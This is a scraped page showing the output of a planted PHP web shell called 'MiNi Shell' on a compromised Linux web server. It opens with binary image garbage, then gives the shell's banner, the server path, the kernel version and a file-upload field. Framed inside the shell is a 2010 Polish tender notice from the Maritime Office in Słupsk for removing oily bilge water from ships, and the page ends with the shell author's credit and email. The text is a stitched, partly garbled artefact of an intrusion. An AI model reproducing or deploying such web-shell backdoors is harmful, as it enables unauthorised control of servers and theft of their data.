JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/387836-N-2010.html

<p class="kh_header"><b>Słupsk: Odbiór wód zaolejonych ze statków 
dla Urzędu Morskiego w Słupsku</b><br>
<b>Numer ogłoszenia: 387836 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Słupsku , Al. Sienkiewicza 18, 76-200 Słupsk, woj. pomorskie, tel. 059 8428406, faks 059 8428406, 8412443.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umsl.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór wód zaolejonych ze statków 
dla Urzędu Morskiego w Słupsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usługi odbioru i transportu do miejsca utylizacji oraz utylizacji wód zaolejonych z kutrów i łodzi rybackich oraz innych statków będących w eksploatacji i zgłaszających taką potrzebę w Porcie Ustka Rowy i w Porcie Łeba, bez pobierania opłat (wyjątki stanowią: statki przedsiębiorstw pogłębiarskich, statki w remontach, okręty Marynarki Wojennej i jednostki pływające Straży Granicznej i Policji).
Przedmiotowa usługa obejmuje odbiór i utylizację wód zaolejonych o kodzie:
13 04 01 - oleje zęzowe ze statków żeglugi morskiej.
2.2.	Przedmiot zamówienia został podzielony na dwa zadania, w zależności od miejsca odbioru wód zaolejonych:
2.2.1.	zadanie nr 1 - odbiór wód zaolejonych w portach: Ustka i Rowy, obejmuje:
a)	odbiór wód zaolejonych ze statków przez autocysternę,
b)	przyjazd autocysterny do portu odbywać się będzie po wcześniejszym, nie dłuższym niż 48 godzin po telefonicznym powiadomieniu Wykonawcy (na wskazany numer kontaktowy) przez funkcjonariusza Kapitanatu Portu  bądź Inspektora Ochrony Środowiska Morskiego,
c)	podstawą odbioru wód ze statków rozliczanych przez Zamawiającego będzie zlecenie wystawione przez funkcjonariusza Kapitanatu Portu lub Inspektora Ochrony Środowiska Morskiego, reprezentujących Urząd Morski w Słupsku,
d)	Wykonawca będzie potwierdzał fakt odebrania wód zaolejonych poprzez wydanie funkcjonariuszowi Kapitanatu Portu lub Inspektorowi Ochrony Środowiska Morskiego, karty przekazania odpadu, zawierającej co najmniej datę wykonania usługi oraz ilość przekazanych odpadów,
e)	usługa będzie rozliczana na podstawie otrzymanej faktury VAT wraz z załączonymi zleceniami, o których mowa z ppkt c),
f)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Ustka:
	w okresie 3 lat: ok 300 m3,
	w okresie 1 roku: ok 100 m3,
	w okresie miesięcznym: ok 8 m3,
g)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Rowy:
w okresie 3 lat - ok 18 m3,
	w okresie 1 roku - ok 6 m3,
g)	podana ilość wód zaolejonych jest jedynie wielkością szacunkową, określoną na podstawie  aktualnego stanu wiedzy Zamawiającego w zakresie rocznego odbierania wód zaolejonych; z uwagi na fakt, iż wielkość faktycznego odbioru wód zaolejonych ze statków nie jest uzależniona od Zamawiającego, w przypadku mniejszej ilości faktycznie zrealizowanych usług Wykonawca nie będzie stawiał względem Zamawiającego żadnych roszczeń odszkodowawczych. 

2.2.2.	zadanie nr 2 - odbiór wód zaolejonych z Portu Łeba, obejmuje:
a)	odbiór wód zaolejonych ze statków przez autocysternę,
b)	przyjazd autocysterny do portu odbywać się będzie po wcześniejszym, nie dłuższym niż 48 godzin po telefonicznym powiadomieniu Wykonawcy (na wskazany numer kontaktowy) przez funkcjonariusza Kapitanatu Portu  bądź Inspektora Ochrony Środowiska Morskiego,
c)	podstawą odbioru wód ze statków rozliczanych przez Zamawiającego będzie zlecenie wystawione przez funkcjonariusza Kapitanatu Portu lub Inspektora Ochrony Środowiska Morskiego, reprezentujących Urząd Morski w Słupsku,
d)	Wykonawca będzie potwierdzał fakt odebrania wód zaolejonych poprzez wydanie funkcjonariuszowi Kapitanatu Portu lub Inspektorowi Ochrony Środowiska Morskiego karty przekazania odpadu, zawierającej co najmniej datę wykonania usługi oraz ilość przekazanych odpadów, 
e)	usługa będzie rozliczana na podstawie otrzymanej faktury VAT wraz z załączonymi zleceniami, o których mowa z ppkt c),
f)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Łeba:
	w okresie 3 lat - ok 150 m3,
	w okresie 1 roku - ok 50 m3,
	w okresie dwumiesięcznym - ok 8 m3,
g)	podana ilość wód zaolejonych jest jedynie wielkością szacunkową, określoną na podstawie  aktualnego stanu wiedzy Zamawiającego w zakresie rocznego odbierania wód zaolejonych; z uwagi na fakt, iż wielkość faktycznego odbioru wód zaolejonych ze statków nie jest uzależniona od Zamawiającego, w przypadku mniejszej ilości faktycznie zrealizowanych usług Wykonawca nie będzie stawiał względem Zamawiającego żadnych roszczeń odszkodowawczych. 
2.3.	Usługa odbioru wód zaolejonych ze statków wykonywana będzie zgodnie z obowiązującymi przepisami z zakresu ochrony środowiska, a w szczególności z:
2.3.1.	ustawą z dnia 12 września 2002 r. o portowych urządzeniach do odbioru odpadów oraz pozostałości ładunkowych ze statków. (Dz.U. 2007 Nr 39 poz. 251 z późn. zm.),
2.3.2.	ustawą z dnia 27 kwietnia 2001 r. o odpadach. (tj. Dz. U. z 2001 r. Nr 62, poz. 628 z późn.zm.).
2.4.	Opis przedmiotu zamówienia za pomocą kodów CPV Wspólnego Słownika Zamówień: 
90.51.00.00-5	 Usuwanie i obróbka odpadów
2.5.	Zamawiający dokonał podziału przedmiotu zamówienia na części, umożliwiając Wykonawcom składanie ofert częściowych na realizację poszczególnych zadań.
2.6.	Zamawiający nie dopuszcza składania ofert wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada aktualne zezwolenie na wykonywanie usług w zakresie odbioru, transportu i utylizacji odpadów niebezpiecznych (kod odpadów 13 04 01) zgodnie z Ustawą o odpadach z dnia 27 kwietnia 2001r. (Dz.U. 2007 Nr 39 poz. 251 z późn.zm.);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia istotnych zmian do  treści zawartej umowy w następującym zakresie:
1.	ceny brutto - w wyniku zmiany obowiązującej stawki VAT:
a)	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę,
b)	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę,
przy czym cena netto pozostaje w tym przypadku stała;
2.	ceny netto i brutto - o stopień inflacji naliczanej zgodnie ze wskaźnikiem wzrostu cen towarów i usług konsumpcyjnych za rok poprzedni, nie częściej niż raz w roku i nie wcześniej niż od 2012 roku.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pok. nr 22 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 10:00, miejsce: Urząd Morski w Słupsku
Al. Sienkiewicza 18
76-200 Słupsk
pok. nr 20 I piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odbiór wód zaolejonych w portach: Ustka i Rowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.2.1.	zadanie nr 1 - odbiór wód zaolejonych w portach: Ustka i Rowy, obejmuje:
a)	odbiór wód zaolejonych ze statków przez autocysternę,
b)	przyjazd autocysterny do portu odbywać się będzie po wcześniejszym, nie dłuższym niż 48 godzin po telefonicznym powiadomieniu Wykonawcy (na wskazany numer kontaktowy) przez funkcjonariusza Kapitanatu Portu  bądź Inspektora Ochrony Środowiska Morskiego,
c)	podstawą odbioru wód ze statków rozliczanych przez Zamawiającego będzie zlecenie wystawione przez funkcjonariusza Kapitanatu Portu lub Inspektora Ochrony Środowiska Morskiego, reprezentujących Urząd Morski w Słupsku,
d)	Wykonawca będzie potwierdzał fakt odebrania wód zaolejonych poprzez wydanie funkcjonariuszowi Kapitanatu Portu lub Inspektorowi Ochrony Środowiska Morskiego, karty przekazania odpadu, zawierającej co najmniej datę wykonania usługi oraz ilość przekazanych odpadów,
e)	usługa będzie rozliczana na podstawie otrzymanej faktury VAT wraz z załączonymi zleceniami, o których mowa z ppkt c),
f)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Ustka:
	w okresie 3 lat: ok. 300 m3,
	w okresie 1 roku: ok. 100 m3,
	w okresie miesięcznym: ok. 8 m3,
g)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Rowy:
	w okresie 3 lat - ok. 18 m3,
	w okresie 1 roku - ok. 6 m3,
g)	podana ilość wód zaolejonych jest jedynie wielkością szacunkową, określoną na podstawie  aktualnego stanu wiedzy Zamawiającego w zakresie rocznego odbierania wód zaolejonych; z uwagi na fakt, iż wielkość faktycznego odbioru wód zaolejonych ze statków nie jest uzależniona od Zamawiającego, w przypadku mniejszej ilości faktycznie zrealizowanych usług Wykonawca nie będzie stawiał względem Zamawiającego żadnych roszczeń odszkodowawczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odbiór wód zaolejonych z Portu Łeba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	odbiór wód zaolejonych ze statków przez autocysternę,
b)	przyjazd autocysterny do portu odbywać się będzie po wcześniejszym, nie dłuższym niż 48 godzin po telefonicznym powiadomieniu Wykonawcy (na wskazany numer kontaktowy) przez funkcjonariusza Kapitanatu Portu  bądź Inspektora Ochrony Środowiska Morskiego,
c)	podstawą odbioru wód ze statków rozliczanych przez Zamawiającego będzie zlecenie wystawione przez funkcjonariusza Kapitanatu Portu lub Inspektora Ochrony Środowiska Morskiego, reprezentujących Urząd Morski w Słupsku,
d)	Wykonawca będzie potwierdzał fakt odebrania wód zaolejonych poprzez wydanie funkcjonariuszowi Kapitanatu Portu lub Inspektorowi Ochrony Środowiska Morskiego karty przekazania odpadu, zawierającej co najmniej datę wykonania usługi oraz ilość przekazanych odpadów, 
e)	usługa będzie rozliczana na podstawie otrzymanej faktury VAT wraz z załączonymi zleceniami, o których mowa z ppkt c),
f)	szacunkowa ilość do odbioru wód zaolejonych w Porcie Łeba:
	w okresie 3 lat - ok. 150 m3,
	w okresie 1 roku - ok. 50 m3,
	w okresie dwumiesięcznym - ok. 8 m3,
g)	podana ilość wód zaolejonych jest jedynie wielkością szacunkową, określoną na podstawie  aktualnego stanu wiedzy Zamawiającego w zakresie rocznego odbierania wód zaolejonych; z uwagi na fakt, iż wielkość faktycznego odbioru wód zaolejonych ze statków nie jest uzależniona od Zamawiającego, w przypadku mniejszej ilości faktycznie zrealizowanych usług Wykonawca nie będzie stawiał względem Zamawiającego żadnych roszczeń odszkodowawczych. 
2.3.	Usługa odbioru wód zaolejonych ze statków wykonywana będzie zgodnie z obowiązującymi przepisami z zakresu ochrony środowiska, a w szczególności z:
2.3.1.	ustawą z dnia 12 września 2002 r. o portowych urządzeniach do odbioru odpadów oraz pozostałości ładunkowych ze statków. (Dz.U. 2007 Nr 39 poz. 251 z późn. zm.),
2.3.2.	ustawą z dnia 27 kwietnia 2001 r. o odpadach. (tj. Dz. U. z 2001 r. Nr 62, poz. 628 z późn.zm.).
2.4.	Opis przedmiotu zamówienia za pomocą kodów CPV Wspólnego Słownika Zamówień: 
90.51.00.00-5	 Usuwanie i obróbka odpadów
2.5.	Zamawiający dokonał podziału przedmiotu zamówienia na części, umożliwiając Wykonawcom składanie ofert częściowych na realizację poszczególnych zadań.
2.6.	Zamawiający nie dopuszcza składania ofert wariantowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com